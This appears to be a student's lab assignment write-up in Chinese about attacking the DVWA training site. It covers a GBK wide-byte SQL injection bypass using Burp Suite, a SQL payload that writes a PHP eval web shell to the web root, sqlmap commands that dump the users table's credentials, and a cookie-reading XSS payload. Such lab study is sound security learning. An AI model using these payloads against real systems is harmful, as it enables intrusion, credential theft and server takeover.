1、利用宽字节注入实现“库名-表名”的注入过程,写清楚注入步骤;
宽字节概念 1、如果一个字符的大小是一个字节的,称为窄字节; 2、如果一个字符的大小是两个及以上字节的,称为宽字节;像GB2312、GBK、GB18030、BIG5、Shift_JIS等编码都是常见的宽字节字符集。英文默认占一个字节,中文占两个字节。宽字节注入原理 宽字节注入利用MySQL的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字。注入过程变化举例: %df%27 ===> addslashes函数 ===> %df%5c%27 ===> 数据库GBK ===> 運'kobe #正常查询 kobe' or 1=1 #尝试一般性kobe%df' or 1=1 #注入 kobe%df\' or 1=1 #转义防护下的提交:kobe%df%5c%27 or 1=1 #kobe%df' or 1=1 #burpsuite 拦截删除5c, 百分号转换为%25,斜杠转换为%5c,单引号转换后%27burpsuite 拦截修改提交: name=kobe%25df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2 ---> name=kobe%df%27+or+1%3D1+%23&submit=%E6%9F%A5%E8%AF%A2后端补充%5c将变成:kobe%df%5c%27 or 1=1 # 在为GBK编码 df 5c 運,所以后端真正提交的是kobe運'or 1=1 #https://blog.csdn.net/qwq1503/article/details/125664874 GBK汉字编码表
2、利用SQL注入实现DVWA站点的Getshell,写清楚攻击步骤;
select 1,2 into outfile -1' union select 1,"<?php eval($_POST['a']);?>" into outfile '/var/www/html/shell2.phphttp://192.168.101.41:8080/shell2.php
3、使用Sqlmap工具完成对DVWA数据库的注入过程,要求按照库、表、列、内容的顺序进行注入;
python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch --dbs
python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -tables
python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" --columns
python sqlmap.py -u "http://192.168.101.41:8080/vulnerabilities/sqli/?id=1&Submit=Submit#" -cookie="PHPSESSID=ajfoa0upur9v2v9tbcipc5lte7; security=low" --batch -D "dvwa" -T "users" -C user,password --dump
--batch 命令来自动答复和判断
--tables 枚举的DBMS数据库中的表
--columns 枚举DBMS数据库表列
--dump 转储数据库表项,即下载
-u URL 目标URL
-D DB 要进行枚举的指定数据库名
-T TBL DBMS数据库表枚举
-C COL DBMS数据库表列枚举
4、完成DVWA靶场存储型XSS的漏洞练习。
xss也是一种注入,是一种跨站脚本注入
XSS的三种类型与区分
1.反射性
也就是通过让用户点击事先准备好的URL,之后保存用户的cookie,之后用用户的cookie去登陆了网站,事先xss攻击
<script>alert(document.cookie);</script>
2.存储型
会把用户输入的数据存储在服务器端中,这种xss攻击可以持久化,并且更加稳定。
代码已经被内嵌进去了,最大的好处:就在于攻击者不需要和用户交互
3.DOM型xss
HTML DOM定义了访问和操作HTML文档的标准方法。意思就是修改html的文档代码,在你打开文档的时候,就会自动执行代码中的内容,其本质和反射型是一样的。